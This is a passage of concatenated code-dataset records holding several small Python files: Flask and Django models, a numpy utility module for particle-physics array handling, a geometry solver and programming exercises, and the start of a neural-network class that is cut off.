self.install_man(\"doc/doxygen.1\")\n","sub_path":"main/doxygen/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"251733634","text":"from application import db\n\nclass ShoppingList(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n items = db.relationship('Items', backref='shopping_list',\n lazy='dynamic')\n\nclass Items(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n description = db.Column(db.String(255))\n list_id = db.Column(db.Integer, db.ForeignKey('shopping_list.id'))\n\n def __repr__(self):\n return self.description\n","sub_path":"application/shopping_list/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"133523894","text":"import math\n\ndef getLineParameters(x1, y1, x2, y2):\n a = y1 - y2\n b = x2 - x1\n c = x1 * y2 - x2 * y1\n\n return (a, b, c)\n\ndef calcArea(x, y, r, p, q, a, t, changeBaseAngle):\n area_circle = math.pi*r*r\n\n l = 10\n ang_a = a + t/2\n pa = p + l * math.cos(math.radians(ang_a))\n qa = q + l * math.sin(math.radians(ang_a))\n\n while ang_a > 180:\n ang_a = ang_a - 360\n\n ang_b = a - t/2\n pb = p + l * math.cos(math.radians(ang_b))\n qb = q + l * math.sin(math.radians(ang_b))\n\n while ang_b > 180:\n ang_b = ang_b - 360\n\n if ang_a < ang_b:\n ang_a = ang_a + 360\n\n # Line A\n la_a, la_b, la_c = getLineParameters(p, q, pa, qa)\n dist_a = ((abs(la_a * x + la_b * y + la_c)) / math.sqrt(la_a * la_a + la_b * la_b))\n\n # Line B\n lb_a, lb_b, lb_c = getLineParameters(p, q, pb, qb)\n dist_b = ((abs(lb_a * x + lb_b * y + lb_c)) / math.sqrt(lb_a * lb_a + lb_b * lb_b))\n\n # Line BASE\n line_a, line_b, line_c = getLineParameters(p, q, x, y)\n if line_b != 0:\n ang_base = math.degrees(math.atan(-line_a/line_b))\n else:\n ang_base = 0.0\n\n if ang_base < 0 and q < y:\n ang_base = ang_base + 180\n elif ang_base > 0 and q > y:\n ang_base = ang_base - 180\n elif p > x:\n ang_base = 180\n\n if ang_base < 0 and changeBaseAngle:\n ang_base = ang_base + 360\n elif ang_base > 0 and changeBaseAngle:\n ang_base = ang_base - 360\n \n selected_a1 = None\n selected_a2 = None\n selected_b1 = None\n selected_b2 = None\n\n if dist_a < r:\n h_a = r - dist_a\n area_a = math.pow(r, 2) * math.acos((r-h_a)/r) - (r - h_a) * math.sqrt(2*r*h_a - math.pow(h_a, 2))\n\n # Solve for line A\n eq_a_a = 1 + math.pow(la_a, 2)/math.pow(la_b, 2)\n eq_a_b = -2*x + 2*la_a*la_c/(math.pow(la_b, 2))+2*la_a*y/la_b\n eq_a_c = math.pow(x, 2) + math.pow(la_c, 2)/math.pow(la_b, 2) + 2*la_c*y/la_b + math.pow(y, 2) - math.pow(r, 2)\n\n solve_a_x1 = (-eq_a_b + math.sqrt(math.pow(eq_a_b, 2) - 4*eq_a_a*eq_a_c))/(2*eq_a_a)\n solve_a_x2 = (-eq_a_b - math.sqrt(math.pow(eq_a_b, 2) - 4*eq_a_a*eq_a_c))/(2*eq_a_a)\n\n solve_a_y1 = -la_a * solve_a_x1 / la_b - la_c/la_b\n solve_a_y2 = -la_a * solve_a_x2 / la_b - la_c/la_b\n\n if pa > p and solve_a_x1 > p:\n selected_a1 = (solve_a_x1, solve_a_y1)\n elif pa < p and solve_a_x1 < p:\n selected_a1 = (solve_a_x1, solve_a_y1)\n elif qa > q and solve_a_y1 > q:\n selected_a1 = (solve_a_x1, solve_a_y1)\n elif qa < q and solve_a_y1 < q:\n selected_a1 = (solve_a_x1, solve_a_y1)\n \n if pa > p and solve_a_x2 > p:\n selected_a2 = (solve_a_x2, solve_a_y2)\n elif pa < p and solve_a_x1 < p:\n selected_a2 = (solve_a_x2, solve_a_y2)\n elif qa > q and solve_a_y1 > q:\n selected_a2 = (solve_a_x2, solve_a_y2)\n elif qa < q and solve_a_y1 < q:\n selected_a2 = (solve_a_x2, solve_a_y2)\n\n if dist_b < r:\n h_b = r - dist_b\n area_b = math.pow(r, 2) * math.acos((r-h_b)/r) - (r - h_b) * math.sqrt(2*r*h_b - math.pow(h_b, 2))\n\n # Solve for line B\n eq_b_a = 1 + math.pow(lb_a, 2)/math.pow(lb_b, 2)\n eq_b_b = -2*x + 2*lb_a*lb_c/(math.pow(lb_b, 2))+2*lb_a*y/lb_b\n eq_b_c = math.pow(x, 2) + math.pow(lb_c, 2)/math.pow(lb_b, 2) + 2*lb_c*y/lb_b + math.pow(y, 2) - math.pow(r, 2)\n\n solve_b_x1 = (-eq_b_b + math.sqrt(math.pow(eq_b_b, 2) - 4*eq_b_a*eq_b_c))/(2*eq_b_a)\n solve_b_x2 = (-eq_b_b - math.sqrt(math.pow(eq_b_b, 2) - 4*eq_b_a*eq_b_c))/(2*eq_b_a)\n\n solve_b_y1 = -lb_a * solve_b_x1 / lb_b - lb_c/lb_b\n solve_b_y2 = -lb_a * solve_b_x2 / lb_b - lb_c/lb_b\n\n if pb > p and solve_b_x1 > p:\n selected_b1 = (solve_b_x1, solve_b_y1)\n elif pb < p and solve_b_x1 < p:\n selected_b1 = (solve_b_x1, solve_b_y1)\n elif qb > q and solve_b_y1 > q:\n selected_b1 = (solve_b_x1, solve_b_y1)\n elif qb < q and solve_b_y1 < q:\n selected_b1 = (solve_b_x1, solve_b_y1)\n\n if pb > p and solve_b_x1 > p:\n selected_b2 = (solve_b_x2, solve_b_y2)\n elif pb < p and solve_b_x1 < p:\n selected_b2 = (solve_b_x2, solve_b_y2)\n elif qb > q and solve_b_y1 > q:\n selected_b2 = (solve_b_x2, solve_b_y2)\n elif qb < q and solve_b_y1 < q:\n selected_b2 = (solve_b_x2, solve_b_y2)\n\n # Distance from cannon to center of circle\n circle_distance = math.sqrt(math.pow(p-x, 2) + math.pow(q-y, 2))\n\n total_area = 0\n # Check if cannon is inside\n if circle_distance < r: \n segment_distance = math.sqrt(math.pow(selected_a1[0]-selected_b1[0], 2) + math.pow(selected_a1[1]-selected_b1[1], 2))\n angle_radian = 2 * math.asin(segment_distance/(2*r))\n area_segment = math.pow(r, 2)/2 * (angle_radian - math.sin(angle_radian))\n\n distance_a = math.sqrt(math.pow(selected_a1[0]-p, 2) + math.pow(selected_a1[1]-q, 2))\n distance_b = math.sqrt(math.pow(selected_b1[0]-p, 2) + math.pow(selected_b1[1]-q, 2))\n area_triangule = distance_a * distance_b/2\n total_area = area_triangule+area_segment\n # Check position of circle\n elif ang_base >= ang_a and dist_a < r:\n # Line A is a possible intersection\n # Check if intersection is valid\n if pa > p and p > solve_a_x1:\n total_area = 0.0\n elif pa < p and p < solve_a_x1:\n total_area = 0.0\n elif qa > q and q > solve_a_y1:\n total_area = 0.0\n elif qa < q and q < solve_a_y1:\n total_area = 0.0\n else:\n total_area = area_a\n\n if selected_b1 and selected_b2:\n total_area = total_area - area_b\n\n elif ang_base <= ang_b and dist_b < r:\n # Line B is A possible an intersection\n # Check if intersection is valid\n if pb > p and p > solve_b_x1:\n total_area = 0.0\n elif pb < p and p < solve_b_x1:\n total_area = 0.0\n elif qb > q and q > solve_b_y1:\n total_area = 0.0\n elif qb < q and q < solve_b_y1:\n total_area = 0.0\n else:\n total_area = area_b\n\n if selected_a1 and selected_a2:\n total_area = total_area - area_a\n\n elif ang_base < ang_a and ang_base > ang_b:\n total_area = area_circle\n\n if dist_a < r:\n # Line A is an intersection\n total_area = total_area - area_a\n \n if dist_b < r:\n # Line B is an intersection\n total_area = total_area - area_b\n else:\n total_area = 0.0\n \n if False:\n print('Cannon points: ({:.1f}, {:.1f}), ({:.1f}, {:.1f}), ({:.1f}, {:.1f})'.format(p, q, pa, qa, pb, qb))\n print('Line: {:.1f}x + {:.1f}y + {:.1f} = 0'.format(line_a, line_b, line_c))\n print('Line A: {:.1f}x + {:.1f}y + {:.1f} = 0'.format(la_a, la_b, la_c))\n print('Line B: {:.1f}x + {:.1f}y + {:.1f} = 0'.format(lb_a, lb_b, lb_c))\n print('Angles of A and B {} <-> {}'.format(ang_a, ang_b))\n print('Base angle', ang_base)\n\n #print('area_circle: {}'.format(area_circle))\n #print('area_a: {}'.format(area_a))\n #print('area_b: {}'.format(area_b))\n\n return total_area\n\nwhile True:\n line = input()\n if line == \"0 0 0\":\n break\n \n line = line.replace('\\n', '')\n line = line.split(' ')\n line = [int(x) for x in line]\n\n x, y, r = line\n\n line = input()\n line = line.replace('\\n', '')\n line = line.split(' ')\n line = [int(x) for x in line]\n p, q, a, t = line\n\n area1 = calcArea(x, y, r, p, q, a, t, False)\n area2 = calcArea(x, y, r, p, q, a, t, True)\n\n if area2 > area1:\n print('{:.1f}'.format(area2))\n else:\n print('{:.1f}'.format(area1))","sub_path":"Python/1102.py","file_name":"1102.py","file_ext":"py","file_size_in_byte":7883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"4876820","text":"# Implement your solution by completing the below function\ndef trap(heights):\n ans = 0\n length=len(heights)\n left=[0]*length\n right=[0]*length\n left[0]=heights[0]\n for i in range(1,length):\n left[i]=max(left[i-1],heights[i])\n right[n-1]=heights[n-1]\n for i in range(n-2,-1,-1):\n right[i]=max(right[i+1],heights[i])\n \n for i in range(n):\n ans+=min(right[i],left[i])-heights[i]\n return ans\n\nif __name__ == '__main__':\n n = int(input())\n heights = []\n if (n != 0):\n heights = input().split()\n heights = [int(i) for i in heights]\n result = trap(heights)\n print(result)\n \n","sub_path":"trapwater.py","file_name":"trapwater.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"194118658","text":"'''\n------------------------------------------------------\nnp_utils.py (Jan 2019, romain.madar@clermont.in2p3.fr)\n------------------------------------------------------\n\n This python module is basically a wrapper of functions to improve\n the use of numpy arrays for variable-size arrays. The main functions\n allow to turn variable-size arrays into constant-size arrays, or to\n perform combinatorics without explicit loops (like pairing).\n\n These util functions were designed with HEP collider physics analysis\n in mind.\n \n'''\n\n\nimport numpy as np\nimport itertools\nimport copy\n\n\ndef count_nonnan(a, axis=-1):\n '''\n Count the number of elements failing np.isnan() along\n a given axis.\n '''\n if axis == -1:\n ntot = a.size\n else:\n ntot = a.shape[axis]\n return ntot-np.count_nonzero(np.isnan(a), axis=axis)\n\n\ndef replace_nan(a, value=0):\n '''\n Replace all np.nan from a by value (0 by default) and return\n a copy of the initial array.\n '''\n output = copy.copy(a)\n output[np.isnan(output)] = value\n return output\n\n\ndef replace_val(a, value_old, value_new=0):\n '''\n Replace all value_old from a by value_new (0 by default) and return a copy\n of the initial array.\n '''\n output = copy.copy(a)\n output[output == value_old] = value_new\n return output\n\n\ndef contains_collections(arrays):\n '''\n Return True if at least one of the dimension\n of the sub-array in arrays is at least 1.\n '''\n dims = np.array([e.ndim for e in arrays])\n return np.count_nonzero(dims >= 1) > 0\n\n\ndef get_indexed_value(a, index):\n '''\n Give the an array of indexed values, with an event-dependent index.\n\n This function takes an array of shape (Nevts,Nobj) and returns an\n array of shape (Nevts,). Each element corresponds the value of the\n ith object, where i is different for each event and are regrouped\n in the array 'index'. For e.g., of one wants the lepton isolation\n for the lepton having the highest eta:\n - lep_iso, shape=(Nevts,Nlep)\n - index=np.argmax(np.abs(lep_eta),axis=1), shape=(Nevts,)\n - iso_max_eta=get_indexed_value(lep_iso,index), shape=(Nevts,)\n\n Parameters\n ----------\n a: np.array\n The shape of this array must be (Nevts,Nobj)\n index: np.array\n The shape of this array must be (Nevts,)\n\n Returns\n -------\n out: np.ndarray\n The shape of the array is (Nevts,)\n\n Examples\n --------\n >>> import numpy as np\n >>> a=np.arange(6).reshape(2,3)\n >>> a\n >>> array([[0, 1, 2],\n [3, 4, 5]])\n >>>\n >>> get_indexed_value(a,index=[0,1])\n >>> array([0, 4])\n '''\n\n # Make sure we manipulate numpy arrays\n a, index = np.array(a), np.array(index)\n\n # Sanity checks\n if a.ndim != 2 or index.ndim != 1:\n err = 'This function requires an array \\'a\\' of dimension 2 (it is currently {})\\n'.format(\n a.ndim)\n err += 'and an array \\'index\\' of dimension 1 (it is currently {})'.format(index.ndim)\n raise NameError(err)\n if a.shape[0] != index.shape[0]:\n err = 'The two array must have the same number of element along the first axis.\\n'\n err += 'while currently \\'a\\' has {} elements and \\'index\\' has {}.'.format(\n a.shape[0], index.shape[0])\n raise NameError(err)\n\n # Actuall work\n N = np.arange(a.shape[0])\n return np.array([a[i, index[i]] for i in N])\n\n\ndef get_all_but_indexed_value(a, index):\n '''\n Give the an array of all values but the indexed ones, with\n an event-dependent index.\n\n This function takes an array of shape (Nevts,Nobj) and returns an\n array of shape (Nevts,Nobj-1). Each element corresponds the value of the\n all objects but the ith, where i is different for each event and are\n regrouped in the array 'index'. For e.g., of one wants the lepton isolation\n for the all leptons but the one with the highest eta:\n - lep_iso, shape=(Nevts,Nlep)\n - index=np.argmax(np.abs(lep_eta),axis=1), shape=(Nevts,)\n - iso_other_eta=get_all_but_indexed_value(lep_iso,index), shape=(Nevts,Nlep-1)\n\n\n Parameters\n ----------\n a: np.array\n The shape of this array must be (Nevts,Nobj)\n index: np.array\n The shape of this array must be (Nevts,)\n\n\n Returns\n -------\n out: np.ndarray\n The shape of the array is (Nevts,Nobj-1)\n\n\n Examples\n --------\n >>> import numpy as np\n >>> a=np.arange(6).reshape(2,3)\n >>> a\n >>> array([[0, 1, 2],\n [3, 4, 5]])\n >>>\n >>> get_all_but_indexed_value(a,index=[0,1])\n >>> array([[1, 2],\n [3, 5]])\n '''\n\n # Make sure we manipulate numpy arrays\n a, index = np.array(a), np.array(index)\n\n # Sanity checks\n if a.ndim != 2 or index.ndim != 1:\n err = 'This function requires an array \\'a\\' of dimension 2 (it is currently {})\\n'.format(\n a.ndim)\n err += 'and an array \\'index\\' of dimension 1 (it is currently {})'.format(index.ndim)\n raise NameError(err)\n if a.shape[0] != index.shape[0]:\n err = 'The two array must have the same number of element along the first axis.\\n'\n err += 'while currently \\'a\\' has {} elements and \\'index\\' has {}.'.format(\n a.shape[0], index.shape[0])\n raise NameError(err)\n\n N = np.arange(a.shape[0])\n return np.array([np.concatenate([a[i, :index[i]], a[i, index[i]+1:]]) for i in N])\n\n\ndef square_jagged_2Darray(a, **kwargs):\n '''\n Give the same dimension to all raws of a jagged 2D array.\n\n This function equalizes the the size of every raw (obj collection)\n using a default value 'val' (nan if nothing specifed) using either\n the maximum size of object collection among all column (events) or\n using a maximum size 'size'. The goal of this function is to fully\n use numpy vectorization which works only on fixed size arrays.\n\n Parameters\n ----------\n a: array of arrays with different sizes this is the jagged 2D\n array to be squared\n\n keyword arguments\n -----------------\n dtype: string\n data type of the variable-size array. If not specified,\n it is 'float32'. None means dt=data.dt.\n nobj: int\n max size of the array.shape[1]. if not specified (or None),\n this size is the maximum size of all raws.\n val: float32\n default value used to fill empty elements in order to get\n the proper size. If not specified (or None), val is np.nan.\n\n Returns\n -------\n out: np.ndarray\n with a dimension (ncol,nobj).\n\n Examples\n --------\n >>> import numpy as np\n >>> a=np.array([\n [1,2,3,4,5],\n [6,7],\n [8],\n [9,10,11,12,13]\n ])\n >>>\n >>> square_jagged_2Darray(a)\n array([[ 1., 2., 3., 4., 5.],\n [ 6., 7., nan, nan, nan],\n [ 8., nan, nan, nan, nan],\n [ 9., 10., 11., 12., 13.]], dtype=float32)\n >>>\n >>> square_jagged_2Darray(a,nobj=2,val=-999)\n >>> array([[ 1., 2.],\n [ 6., 7.],\n [ 8., -999.],\n [ 9., 10.]], dtype=float32)\n '''\n\n # Sanity checks\n if a.ndim >= 2:\n err = 'The input array a should be a 1D array of 0D/1D arrays. This means that '\n err += 'a.shape=(N,) or (1,) while here '\n err += 'a.shape={}'.format(a.shape)\n raise NameError(err)\n dims = np.array([e.ndim for e in a])\n Neq0, Ngt2 = np.count_nonzero(dims == 0), np.count_nonzero(dims >= 2)\n if Neq0 == len(a):\n return a\n if Neq0 > 0 or Ngt2 > 0:\n err = 'The input array should be a 1D array of 1D arrays'\n err += ' in order to be converted into a 2D array.\\n Some'\n err += ' of the sub-array have dim>=2 or dim=0 (ie not an array):\\n'\n err += ' -> Number of d==0 element: {} (if ==len(a), it\\'s not a jagged array!)\\n'.format(Ngt2)\n err += ' -> Number of d>=2 element: {}\\n'.format(Ngt2)\n raise NameError(err)\n\n # kwargs\n val, size, dtype = np.nan, None, 'float32'\n if 'dtype' in kwargs:\n dtype = kwargs['dtype']\n if 'nobj' in kwargs:\n size = kwargs['nobj']\n if 'val' in kwargs:\n val = kwargs['val']\n\n # Get lengths of each row of data\n lens = np.array([len(i) for i in a])\n\n # Mask valid places in each row\n mask = np.arange(lens.max()) < lens[:, None]\n\n # Setup output array and put elements from data into masked positions\n if (dtype):\n dt = dtype\n else:\n dt = a.dtype\n out = np.zeros(mask.shape, dtype=dt)\n out.fill(val)\n out[mask] = np.concatenate(a)\n\n # Keep the number of element to size\n if size:\n out = out[:, :size]\n\n return out\n\n\ndef all_pairs_nd(a, b=None, Nmax=None, axis=1, timing=False):\n '''\n Compute all possible pairs along a given axis.\n\n This function performs the list of all possible pairs along a given axis\n of the between the two arrays a and b. The typical use case it the following:\n there are Nevts events with two collections of 5 vectors {r_i} and 10 vector\n {q_j} (where each vector q,r=(px,py,pz)), and the pair (q,r) with the smallest\n distance is wanted. In that case, one has:\n a.shape=(Nevts, 5,3)\n b.shape=(Nevts,10,3)\n all_pairs_nd(a,b).shape=(Nevts,50,2,3)\n\n NB1: If only a is given, the unordered/unrepeated combinations\n are performed.\n NB2: all axis must have the same dimension, expect the one along which the\n pairing is done.\n\n Parameters\n ----------\n a: np.ndarray\n The array contains the objects collection for each event. If Nobja\n is the number of objects a and k the number of variable of each object a\n (e.g. [px,py,pz,E,btagg,iso]): a.shape=(Nevt,Nobj_a,k)\n b: np.ndarray\n The array contains the objects collection for each event. If Nobj\n is the number of objects and l the number of variable of each object b\n (e.g. [px,py,pz,E,btagg,iso]): l must be equal to k and b.shape=(Nevt,Nobj_b,k).\n If not specified, combinations of a elements are returned.\n Nmax: int\n Maximal number of elements considered to compute all combinations\n axis: int\n The dimension along which the pairing is done (axis=1 if not specified since\n the most common HEP array is (Nevt,Nobj,k)).\n timing: boolean\n Print the time of each of the four main steps and the total one (useful\n to degub).\n\n Returns\n -------\n pairs: nd.ndarray\n For each event (element along axis=0), the output array has Npairs of 2 objects,\n meaning that output.shape=(Nevt, Npairs, 2, k).\n\n Examples\n --------\n >>> import numy as np\n >>> a=np.array([ # Nevt=1, Nobj=3, k=2\n [[0, 1],[2, 3],[4, 5]]\n ])\n >>>\n >>> b=np.array([ # Nevt=1, Nobj=2, k=2\n [[6, 7],[8, 9]]\n ])\n >>>\n >>> all_pairs_nd(a,b)\n >>> array([\n [\n [[0, 1],[6, 7]],\n\n [[0, 1],[8, 9]],\n\n [[2, 3],[6, 7]],\n\n [[2, 3],[8, 9]],\n\n [[4, 5],[6, 7]],\n\n [[4, 5],[8, 9]]\n ]\n ])\n >>>\n >>> all_pairs_nd(a)\n >>> array([\n [\n [[0, 1],[2, 3]],\n\n [[0, 1],[4, 5]],\n\n [[2, 3],[4, 5]]\n ]\n ])\n >>>\n >>> npu.all_pairs_nd(a,Nmax=2)\n >>> array([\n [\n [[0, 1],[2, 3]]\n ]\n ])\n '''\n\n from timeit import default_timer\n t0 = default_timer()\n\n # Is it the same collection\n same_arrays = b is None\n\n # Sanity check\n if not same_arrays:\n good_shape = np.array_equal(np.delete(a.shape, axis), np.delete(b.shape, axis))\n if not good_shape:\n err = 'The shape along all dimensions but the one of axis={}'.format(axis)\n err += ' should be equal, while here:\\n'\n err += ' -> shape of a is {} \\n'.format(a.shape)\n err += ' -> shape of b is {} \\n'.format(b.shape)\n raise NameError(err)\n\n # Reduce the number of objects to Nmax\n if Nmax:\n sl = [slice(None)]*a.ndim\n sl[axis] = slice(0, Nmax)\n if same_arrays:\n a, b = a[sl], None\n else:\n a, b = a[sl], b[sl]\n\n t1 = default_timer()\n if timing:\n print(' * Sanity checks done in {:.3f}s'.format(t1-t0))\n\n # Individual indices\n if same_arrays:\n ia, jb = np.arange(a.shape[axis]), []\n else:\n ia, jb = np.arange(a.shape[axis]), np.arange(b.shape[axis])\n\n t2 = default_timer()\n if timing:\n print(' * Individual indices done in {:.3f}'.format(t2-t1))\n\n # Pairs of indicies\n dt = np.dtype([('', np.intp)]*2)\n if same_arrays:\n ij = np.fromiter(itertools.combinations(ia, 2), dtype=dt)\n else:\n ij = np.fromiter(itertools.product(ia, jb), dtype=dt)\n ij = ij.view(np.intp).reshape(-1, 2)\n\n t3 = default_timer()\n if timing:\n print(' * Pairs of indices done in {:.3f}s'.format(t3-t2))\n\n # Array of all pairs\n if same_arrays:\n out = np.take(a, ij, axis=axis)\n else:\n out = np.stack([a.take(ij[:, 0], axis=axis), b.take(ij[:, 1], axis=axis)], axis=axis+1)\n\n t4 = default_timer()\n if timing:\n print(' * Take and stack arrays done in {:.3f}s'.format(t4-t3))\n if timing:\n print(' ==> total time: {:.3f}'.format(t4-t0))\n\n return out\n\n\ndef df2array(df, variables, **kwargs):\n '''\n Convert a list of Ncols pandas dataframe columns into a regular\n (Nevt,Nobj,Ncol)-dim numpy array.\n\n In practice, the exact size of the final array is Nevt (the number\n of events), Nobj (number of objects) and Ncol which is the number of\n float for each event and object.\n\n It is possible to give default values in order to later form collections\n with the same number of variables:\n jets =df2array(df,['jet_eta', 'jet_phi', 'jet_bw', '999'])\n electrons=df2array(df,[ 'el_pt' , 'el_phi , 'nan', 'trk_iso'])\n pairs =all_pairs_nd(jets,electrons)\n This allows to get the electron isolation and the b-tagging weight\n for the electron-jet pair being the closest to each other.\n\n Parameters\n ----------\n df: pandas.DataFrame\n variables: list of column names to extract\n\n keyword arguments\n -----------------\n The same as for square_jagged_2Darray(a,**kwargs) function\n\n Returns\n -------\n output: np.array\n 3D array given with output.shape=(df[v].shape[0],df[v].shape[1],len(variables))\n\n Examples\n --------\n >>>\n >>> data=pd.DataFrame(data={\n 'jet_eta':np.array([np.array([1,2,3]),np.array([4,5])]),\n 'jet_phi':np.array([np.array([6,7,8]),np.array([9,10])]),\n })\n >>> print(data)\n >>> jet_eta jet_phi\n 0 [1, 2, 3] [6, 7, 8]\n 1 [4, 5] [9, 10]\n >>>\n >>> jets_direction=npu.df2array(data,['jet_eta','jet_phi'])\n >>> jets_direction\n >>> array([[[ 1., 6.],\n [ 2., 7.],\n [ 3., 8.]],\n\n [[ 4., 9.],\n [ 5., 10.],\n [ nan, nan]]], dtype=float32)\n '''\n\n # Get the default array with the proper shape\n if variables[0] not in df.columns:\n err = 'The first variable must be a valid column and not a default value.\\n'\n err += 'The variable \\'{}\\' is not in the list of dataframe columns'.format(variables[0])\n raise NameError(err)\n Nevt, Nobj = len(df), np.max([len(i) for i in df[variables[0]].values])\n if 'nobj' in kwargs:\n Nobj = kwargs['nobj']\n\n def default_array(str_val):\n try:\n val = float(str_val)\n except ValueError:\n if str_val in ('nan', 'NaN', 'Nan', 'NAN'):\n val = np.nan\n else:\n err = 'The default value \\'{}\\' is not supported. Please only use '.format(str_val)\n err += 'a number in a string (e.g. \\'999\\') or \\'nan\\'.'\n raise NameError(err)\n return np.full_like(np.zeros((Nevt, Nobj)), val)\n\n # Get the list of all arrays, each of shape: (Nevts,Nobj)\n list_arrays = [square_jagged_2Darray(df[v].values, **kwargs)\n if v in df.columns else default_array(v) for v in variables]\n\n # Check that there are a collection (and not only value, like MET)\n isCollection = contains_collections(list_arrays)\n\n # Adding a dimension for further concatenation in case of\n # (Nevts,Nobj) shape; new shape is (Nevts,Nobj,1)\n list_arrays = [a[..., None] if a.ndim == 2 else a for a in list_arrays]\n\n # Check that the number of object is the same for all column\n if isCollection:\n axis = 2\n if np.std([a.shape[1] for a in list_arrays]) != 0:\n err = 'The shape along the dimensions of axis=1 (number of objects) '\n err += 'must be the same for all variables. This function cannot merge different '\n err += 'object collections (eg \"jet_pT\" and \"ele_pT\").\\n'\n err += 'If you need to do so, check stack_collection() functions.'\n raise NameError(err)\n else:\n axis = 1\n\n # Performe the concatenation and output shape is (Nevts,Nobj,Nvariables)\n return np.concatenate(list_arrays, axis=axis)\n\n\ndef stack_collections(arrays):\n '''\n Stack list of arrays of shape (Nevts,Nobj_i,Nval) along axis=1.\n\n The typical use case of the function is to build a single collection\n of objects from different collections. Let's take the example where\n one wants to make a 'lepton' collection out of 'electron' and 'muon'\n collection: each collection has Nval variables so that each array will\n be of shape el.shape=(Nevts,Nel,Nval) and mu.shape=(Nevts,Nmu,Nval).\n lep=stack_collections([el,mu]) will have lep.shape(Nevt,Nel+Nmu,Nval).\n\n\n Parameters:\n ----------\n arrays: list of ndarray\n arrays which needs to be stacked\n\n\n Return:\n -------\n output: ndarray\n array of shape (Nevt,Ntot,Nval) where Ntot\n is the sum of all objects (e.g. Nlep+Njet)\n\n\n Examples:\n --------\n >>> a=np.arange(30).reshape(2,5,3)\n >>> a # 2 events, 5 objects, 3 variables\n >>> array([\n [\n [ 0, 1, 2],\n [ 3, 4, 5],\n [ 6, 7, 8],\n [ 9, 10, 11],\n [12, 13, 14]\n ],\n\n [\n [15, 16, 17],\n [18, 19, 20],\n [21, 22, 23],\n [24, 25, 26],\n [27, 28, 29]\n ]\n ])\n >>>\n >>> b=np.arange(12).reshape(2,2,3)\n >>> b # 2 events, 2 objects, 3 variables\n >>> array([\n [\n [ 0, 1, 2],\n [ 3, 4, 5]\n ],\n\n [\n [ 6, 7, 8],\n [ 9, 10, 11]\n ]\n ])\n >>>\n >>> npu.stack_collections([a,b])\n >>> array([\n [\n [ 0, 1, 2],\n [ 3, 4, 5],\n [ 6, 7, 8],\n [ 9, 10, 11],\n [12, 13, 14],\n [ 0, 1, 2],\n [ 3, 4, 5]\n ],\n\n [\n [15, 16, 17],\n [18, 19, 20],\n [21, 22, 23],\n [24, 25, 26],\n [27, 28, 29],\n [ 6, 7, 8],\n [ 9, 10, 11]\n ]\n ])\n '''\n\n # Check there are collection\n if not contains_collections(arrays):\n err = 'One of the array is not a collection, while this function needs '\n err += 'collections of objects (ie at least 2D arrays - 1D for events '\n err += 'and 1D for the collection'\n raise NameError(err)\n\n # Check that the number of variables per object is the same for all column\n has_one_var = np.count_nonzero([a.ndim == 1 for a in arrays]) == len(arrays)\n if not has_one_var:\n is_ok = True\n elif len(np.unique([a.shape[2] for a in arrays])) != 0:\n is_ok = False\n else:\n is_ok = True\n if not is_ok:\n err = 'The shape along the dimensions of axis=2 (number of variables per object) '\n err += 'must be the same for all objects. This function cannot merge '\n err += 'collections with different number of variables (eg [jet_pT,jet_eta] and [ele_pT]).\\n'\n raise NameError(err)\n\n out = np.concatenate(arrays, axis=1)\n return out\n","sub_path":"lecture/np_utils.py","file_name":"np_utils.py","file_ext":"py","file_size_in_byte":20059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"468567204","text":"'''\n6.6. Adição de elementos à lista\n'''\n\nL = []\n\nwhile True:\n n = int(input(\"Digite um número: ('0' para sair): \"))\n if n == 0:\n print(\"Saindo do programa...\")\n break\n L.append(n)\n\nx = 0\nwhile x < len(L):\n print(L[x])\n x += 1\n\nprint(f\"Lista completa: {L}\")\n","sub_path":"pythonBook/chapter06/exercise6-6.py","file_name":"exercise6-6.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"301989496","text":"from django.db import models\n\nclass Test(models.Model):\n \n title = models.TextField(\n verbose_name='Название теста',\n max_length=255,\n )\n\n def __str__(self):\n return self.title\n\n class Meta():\n verbose_name = 'Тест'\n verbose_name_plural = 'Тесты' \n\nclass Answer(models.Model):\n\n question = models.ForeignKey(\n to=\"Question\",\n on_delete = models.CASCADE,\n related_name='answers'\n )\n\n title = models.TextField(\n verbose_name='Вариант ответа',\n max_length=200,\n )\n\n is_correct_answer = models.BooleanField(\n verbose_name='Правильный ответ'\n )\n \n def __str__(self):\n return '%s' % self.title\n\n class Meta():\n verbose_name = 'Ответ'\n verbose_name_plural = 'Ответы' \n\nclass Question(models.Model):\n test = models.ForeignKey (\n to = Test,\n on_delete = models.CASCADE,\n related_name = 'questions'\n\n )\n\n title = models.TextField(\n verbose_name='Вопрос',\n max_length=400,\n )\n\n def __str__(self):\n return '%s' % self.title\n\n class Meta():\n verbose_name = 'Вопрос'\n verbose_name_plural = 'Вопросы' \n\n\n","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"451127463","text":"from seamless.highlevel import Context, mylib\n\nctx = Context()\nctx.spam = \"spam\"\nmylib.Test = ctx\nmylib.Test.set_constructor(\n constructor=lambda ctx: ctx,\n post_constructor=None,\n args=[],\n direct_library_access=True\n)\nctx = Context()\nctx.test = mylib.Test()\nprint(ctx.test.spam)\nprint(ctx.test.spam.value)\n","sub_path":"tests/highlevel/constructor/simplest.py","file_name":"simplest.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"497743547","text":"import numpy as np\r\n\r\n\r\n\r\n\r\n\r\nclass NeuralNetwork():\r\n\r\n def __init__(self):\r\n # Сид генератора чисел для одинаковой работы программы\r\n np.random.seed(1)\r\n\r\n # Задаём случайные веса(10 цифр по 15 клеточек)\r\n 